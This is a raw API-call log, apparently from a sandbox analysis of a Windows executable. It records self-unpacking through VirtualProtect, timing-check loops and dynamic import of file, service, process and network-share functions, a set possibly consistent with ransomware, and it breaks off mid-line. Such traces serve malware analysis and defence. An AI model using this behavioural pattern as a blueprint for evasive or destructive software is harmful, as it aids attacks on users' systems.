CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xf7\x51\xb2\x2e\x9c\xfe\x18", lpUsedDefaultChar=0x0) returned 256 [0237.974] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x42b272) returned 0x0 [0237.975] RtlSizeHeap (HeapHandle=0x2490000, Flags=0x0, MemoryPointer=0x2492b38) returned 0x80 [0238.041] RtlSizeHeap (HeapHandle=0x2490000, Flags=0x0, MemoryPointer=0x2492b38) returned 0x80 [0238.041] RtlSizeHeap (HeapHandle=0x2490000, Flags=0x0, MemoryPointer=0x2492b38) returned 0x80 [0238.041] RtlSizeHeap (HeapHandle=0x2490000, Flags=0x0, MemoryPointer=0x2492b38) returned 0x80 [0238.042] RtlSizeHeap (HeapHandle=0x2490000, Flags=0x0, MemoryPointer=0x2492b38) returned 0x80 [0238.075] GetTickCount () returned 0x667f [0238.075] GetTickCount () returned 0x667f [0238.075] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.076] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.077] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.078] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.079] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.080] GetTickCount () returned 0x667f [0238.081] GetTickCount () returned 0x667f [0238.081] GetTickCount () returned 0x667f [0238.081] GetTickCount () returned 0x667f [0238.081] GetTickCount () returned 0x667f [0238.081] GetTickCount () returned 0x667f [0238.081] GetTickCount () returned 0x667f [0238.081] GetTickCount () returned 0x667f [0238.081] GetTickCount () returned 0x667f [0238.081] GetTickCount () returned 0x667f [0238.081] GetTickCount () returned 0x667f [0238.081] GetTickCount () returned 0x667f [0238.081] GetTickCount () returned 0x667f [0238.081] GetTickCount () returned 0x667f [0238.081] GetTickCount () returned 0x667f [0238.081] GetTickCount () returned 0x667f [0238.081] GetTickCount () returned 0x667f [0238.081] GetTickCount () returned 0x667f [0238.081] GetTickCount () returned 0x667f [0238.081] GetTickCount () returned 0x667f [0238.081] GetTickCount () returned 0x667f [0238.081] GetTickCount () returned 0x667f [0238.172] LocalAlloc (uFlags=0x0, uBytes=0x17e50) returned 0xb123e0 [0238.172] LocalAlloc (uFlags=0x0, uBytes=0x17e50) returned 0xb2a238 [0238.779] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a00000 [0238.779] GetProcAddress (hModule=0x75a00000, lpProcName="GlobalAlloc") returned 0x75a1588e [0238.782] lstrcpyA (in: lpString1=0x450090, lpString2="Virtual" | out: lpString1="Virtual") returned="Virtual" [0239.035] lstrcatA (in: lpString1="Virtual", lpString2="Protect" | out: lpString1="VirtualProtect") returned="VirtualProtect" [0239.035] GetProcAddress (hModule=0x75a00000, lpProcName="VirtualProtect") returned 0x75a1435f [0239.036] VirtualProtect (in: lpAddress=0xb42090, dwSize=0x11ebc, flNewProtect=0x40, lpflOldProtect=0x18f6c0 | out: lpflOldProtect=0x18f6c0*=0x4) returned 1 [0239.043] GetProcAddress (hModule=0x75a00000, lpProcName="LoadLibraryA") returned 0x75a149d7 [0239.043] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75a00000 [0239.043] GetProcAddress (hModule=0x75a00000, lpProcName="VirtualAlloc") returned 0x75a11856 [0239.043] GetProcAddress (hModule=0x75a00000, lpProcName="VirtualProtect") returned 0x75a1435f [0239.043] GetProcAddress (hModule=0x75a00000, lpProcName="VirtualFree") returned 0x75a1186e [0239.043] GetProcAddress (hModule=0x75a00000, lpProcName="GetVersionExA") returned 0x75a13519 [0239.043] GetProcAddress (hModule=0x75a00000, lpProcName="TerminateProcess") returned 0x75a2d802 [0239.044] GetProcAddress (hModule=0x75a00000, lpProcName="ExitProcess") returned 0x75a17a10 [0239.044] GetProcAddress (hModule=0x75a00000, lpProcName="SetErrorMode") returned 0x75a11b00 [0239.044] SetErrorMode (uMode=0x400) returned 0x0 [0239.044] SetErrorMode (uMode=0x0) returned 0x400 [0239.044] GetVersionExA (in: lpVersionInformation=0x18ee4c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x2, dwPlatformId=0xffffffff, szCSDVersion="s}Dw") | out: lpVersionInformation=0x18ee4c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0239.044] VirtualAlloc (lpAddress=0x0, dwSize=0x17200, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0239.046] VirtualProtect (in: lpAddress=0x400000, dwSize=0x19000, flNewProtect=0x40, lpflOldProtect=0x18fed4 | out: lpflOldProtect=0x18fed4*=0x2) returned 1 [0239.048] VirtualFree (lpAddress=0x210000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0239.049] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x75a00000 [0239.049] GetProcAddress (hModule=0x75a00000, lpProcName="GetProcAddress") returned 0x75a11222 [0239.049] GetProcAddress (hModule=0x75a00000, lpProcName="LoadLibraryA") returned 0x75a149d7 [0239.049] GetProcAddress (hModule=0x75a00000, lpProcName="WaitForSingleObject") returned 0x75a11136 [0239.049] GetProcAddress (hModule=0x75a00000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x75a11916 [0239.049] GetProcAddress (hModule=0x75a00000, lpProcName="LeaveCriticalSection") returned 0x77432270 [0239.049] GetProcAddress (hModule=0x75a00000, lpProcName="GetLastError") returned 0x75a111c0 [0239.049] GetProcAddress (hModule=0x75a00000, lpProcName="EnterCriticalSection") returned 0x774322b0 [0239.049] GetProcAddress (hModule=0x75a00000, lpProcName="ReleaseMutex") returned 0x75a1111e [0239.049] GetProcAddress (hModule=0x75a00000, lpProcName="CloseHandle") returned 0x75a11410 [0239.049] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x73260000 [0239.879] GetProcAddress (hModule=0x73260000, lpProcName="atexit") returned 0x7327c544 [0239.879] atexit (param_1=0xb429b0) returned 0 [0239.880] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75a00000 [0239.880] GetProcAddress (hModule=0x75a00000, lpProcName="GetProcAddress") returned 0x75a11222 [0239.880] GetProcAddress (hModule=0x75a00000, lpProcName="GetModuleHandleW") returned 0x75a134b0 [0239.880] GetProcAddress (hModule=0x75a00000, lpProcName="FindNextFileW") returned 0x75a154ee [0239.880] GetProcAddress (hModule=0x75a00000, lpProcName="FindClose") returned 0x75a14442 [0239.880] GetProcAddress (hModule=0x75a00000, lpProcName="MoveFileW") returned 0x75a29af0 [0239.880] GetProcAddress (hModule=0x75a00000, lpProcName="GetFileSizeEx") returned 0x75a159e2 [0239.880] GetProcAddress (hModule=0x75a00000, lpProcName="GetModuleFileNameW") returned 0x75a14950 [0239.880] GetProcAddress (hModule=0x75a00000, lpProcName="GetFileAttributesW") returned 0x75a11b18 [0239.880] GetProcAddress (hModule=0x75a00000, lpProcName="ExitProcess") returned 0x75a17a10 [0239.880] GetProcAddress (hModule=0x75a00000, lpProcName="GetCommandLineW") returned 0x75a15223 [0239.880] GetProcAddress (hModule=0x75a00000, lpProcName="GetComputerNameW") returned 0x75a1dd0e [0239.880] GetProcAddress (hModule=0x75a00000, lpProcName="GetComputerNameA") returned 0x75a2b6e0 [0239.881] GetProcAddress (hModule=0x75a00000, lpProcName="CreateMutexW") returned 0x75a1424c [0239.881] GetProcAddress (hModule=0x75a00000, lpProcName="lstrlenW") returned 0x75a11700 [0239.881] GetProcAddress (hModule=0x75a00000, lpProcName="lstrlenA") returned 0x75a15a4b [0239.881] GetProcAddress (hModule=0x75a00000, lpProcName="GetCurrentProcess") returned 0x75a11809 [0239.881] GetProcAddress (hModule=0x75a00000, lpProcName="WaitForSingleObject") returned 0x75a11136 [0239.881] GetProcAddress (hModule=0x75a00000, lpProcName="GetLogicalDrives") returned 0x75a15371 [0239.881] GetProcAddress (hModule=0x75a00000, lpProcName="GetTickCount") returned 0x75a1110c [0239.881] GetProcAddress (hModule=0x75a00000, lpProcName="DeleteFileW") returned 0x75a189b3 [0239.881] GetProcAddress (hModule=0x75a00000, lpProcName="WideCharToMultiByte") returned 0x75a1170d [0239.881] GetProcAddress (hModule=0x75a00000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x75a11916 [0239.881] GetProcAddress (hModule=0x75a00000, lpProcName="Sleep") returned 0x75a110ff [0239.881] GetProcAddress (hModule=0x75a00000, lpProcName="LeaveCriticalSection") returned 0x77432270 [0239.881] GetProcAddress (hModule=0x75a00000, lpProcName="ReadFile") returned 0x75a13ed3 [0239.881] GetProcAddress (hModule=0x75a00000, lpProcName="CreateFileW") returned 0x75a13f5c [0239.881] GetProcAddress (hModule=0x75a00000, lpProcName="OpenMutexW") returned 0x75a15151 [0239.882] GetProcAddress (hModule=0x75a00000, lpProcName="EnterCriticalSection") returned 0x774322b0 [0239.882] GetProcAddress (hModule=0x75a00000, lpProcName="WaitForMultipleObjects") returned 0x75a14220 [0239.882] GetProcAddress (hModule=0x75a00000, lpProcName="lstrcmpiW") returned 0x75a2d5cd [0239.882] GetProcAddress (hModule=0x75a00000, lpProcName="lstrcmpiA") returned 0x75a13e8e [0239.882] GetProcAddress (hModule=0x75a00000, lpProcName="DeleteCriticalSection") returned 0x774445f5 [0239.882] GetProcAddress (hModule=0x75a00000, lpProcName="ReleaseMutex") returned 0x75a1111e [0239.882] GetProcAddress (hModule=0x75a00000, lpProcName="CloseHandle") returned 0x75a11410 [0239.882] GetProcAddress (hModule=0x75a00000, lpProcName="GetVersion") returned 0x75a14467 [0239.882] GetProcAddress (hModule=0x75a00000, lpProcName="CreateThread") returned 0x75a134d5 [0239.882] GetProcAddress (hModule=0x75a00000, lpProcName="ExpandEnvironmentStringsW") returned 0x75a14173 [0239.882] GetProcAddress (hModule=0x75a00000, lpProcName="QueryPerformanceCounter") returned 0x75a11725 [0239.882] GetProcAddress (hModule=0x75a00000, lpProcName="QueryPerformanceFrequency") returned 0x75a141f0 [0239.882] GetProcAddress (hModule=0x75a00000, lpProcName="GetCurrentProcessId") returned 0x75a111f8 [0239.882] GetProcAddress (hModule=0x75a00000, lpProcName="SetFileAttributesW") returned 0x75a2d4f7 [0239.882] GetProcAddress (hModule=0x75a00000, lpProcName="GetVolumeInformationW") returned 0x75a2c860 [0239.882] GetProcAddress (hModule=0x75a00000, lpProcName="WriteFile") returned 0x75a11282 [0239.883] GetProcAddress (hModule=0x75a00000, lpProcName="SetFilePointerEx") returned 0x75a2c807 [0239.883] GetProcAddress (hModule=0x75a00000, lpProcName="SetEndOfFile") returned 0x75a2ce2e [0239.883] GetProcAddress (hModule=0x75a00000, lpProcName="FindFirstFileW") returned 0x75a14435 [0239.883] GetProcAddress (hModule=0x75a00000, lpProcName="GetProcessHeap") returned 0x75a114e9 [0239.883] GetProcAddress (hModule=0x75a00000, lpProcName="HeapReAlloc") returned 0x77451f6e [0239.883] GetProcAddress (hModule=0x75a00000, lpProcName="HeapAlloc") returned 0x7743e026 [0239.883] GetProcAddress (hModule=0x75a00000, lpProcName="HeapFree") returned 0x75a114c9 [0239.883] GetProcAddress (hModule=0x75a00000, lpProcName="CreatePipe") returned 0x75a9415b [0239.883] GetProcAddress (hModule=0x75a00000, lpProcName="SetHandleInformation") returned 0x75a2195c [0239.883] GetProcAddress (hModule=0x75a00000, lpProcName="CreateProcessW") returned 0x75a1103d [0239.883] GetProcAddress (hModule=0x75a00000, lpProcName="CompareStringW") returned 0x75a13bca [0239.883] GetProcAddress (hModule=0x75a00000, lpProcName="CompareStringA") returned 0x75a13c5a [0239.883] GetProcAddress (hModule=0x75a00000, lpProcName="OpenProcess") returned 0x75a11986 [0239.883] GetProcAddress (hModule=0x75a00000, lpProcName="TerminateProcess") returned 0x75a2d802 [0239.884] GetProcAddress (hModule=0x75a00000, lpProcName="GetSystemTime") returned 0x75a15a96 [0239.884] GetProcAddress (hModule=0x75a00000, lpProcName="SystemTimeToFileTime") returned 0x75a15a7e [0239.884] GetProcAddress (hModule=0x75a00000, lpProcName="GetLastError") returned 0x75a111c0 [0239.884] GetProcAddress (hModule=0x75a00000, lpProcName="CreateToolhelp32Snapshot") returned 0x75a3735f [0239.884] GetProcAddress (hModule=0x75a00000, lpProcName="Process32NextW") returned 0x75a3896c [0239.884] GetProcAddress (hModule=0x75a00000, lpProcName="Process32FirstW") returned 0x75a38baf [0239.884] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x74fd0000 [0239.884] GetProcAddress (hModule=0x74fd0000, lpProcName="RegOpenKeyExW") returned 0x74fe468d [0239.884] GetProcAddress (hModule=0x74fd0000, lpProcName="RegQueryValueExW") returned 0x74fe46ad [0239.884] GetProcAddress (hModule=0x74fd0000, lpProcName="RegSetValueExW") returned 0x74fe14d6 [0239.884] GetProcAddress (hModule=0x74fd0000, lpProcName="RegCloseKey") returned 0x74fe469d [0239.884] GetProcAddress (hModule=0x74fd0000, lpProcName="OpenProcessToken") returned 0x74fe4304 [0239.884] GetProcAddress (hModule=0x74fd0000, lpProcName="GetTokenInformation") returned 0x74fe431c [0239.884] GetProcAddress (hModule=0x74fd0000, lpProcName="OpenSCManagerW") returned 0x74fdca64 [0239.884] GetProcAddress (hModule=0x74fd0000, lpProcName="OpenServiceW") returned 0x74fdca4c [0239.885] GetProcAddress (hModule=0x74fd0000, lpProcName="CloseServiceHandle") returned 0x74fe369c [0239.885] GetProcAddress (hModule=0x74fd0000, lpProcName="ControlService") returned 0x74ff7144 [0239.885] GetProcAddress (hModule=0x74fd0000, lpProcName="QueryServiceStatus") returned 0x74fe2a86 [0239.885] GetProcAddress (hModule=0x74fd0000, lpProcName="EnumDependentServicesW") returned 0x74fd1e3a [0239.885] GetProcAddress (hModule=0x74fd0000, lpProcName="EnumServicesStatusExW") returned 0x74fdb466 [0239.885] LoadLibraryA (lpLibFileName="user32.dll") returned 0x75f80000 [0239.885] GetProcAddress (hModule=0x75f80000, lpProcName="SystemParametersInfoW") returned 0x75f990d3 [0239.885] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x76260000 [0239.888] GetProcAddress (hModule=0x76260000, lpProcName="ShellExecuteExW") returned 0x76281e46 [0239.889] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77410000 [0239.889] GetProcAddress (hModule=0x77410000, lpProcName="NtQuerySystemInformation") returned 0x7742fda0 [0239.889] LoadLibraryA (lpLibFileName="mpr.dll") returned 0x73220000 [0239.896] GetProcAddress (hModule=0x73220000, lpProcName="WNetCloseEnum") returned 0x73222dd6 [0239.896] GetProcAddress (hModule=0x73220000, lpProcName="WNetOpenEnumW") returned 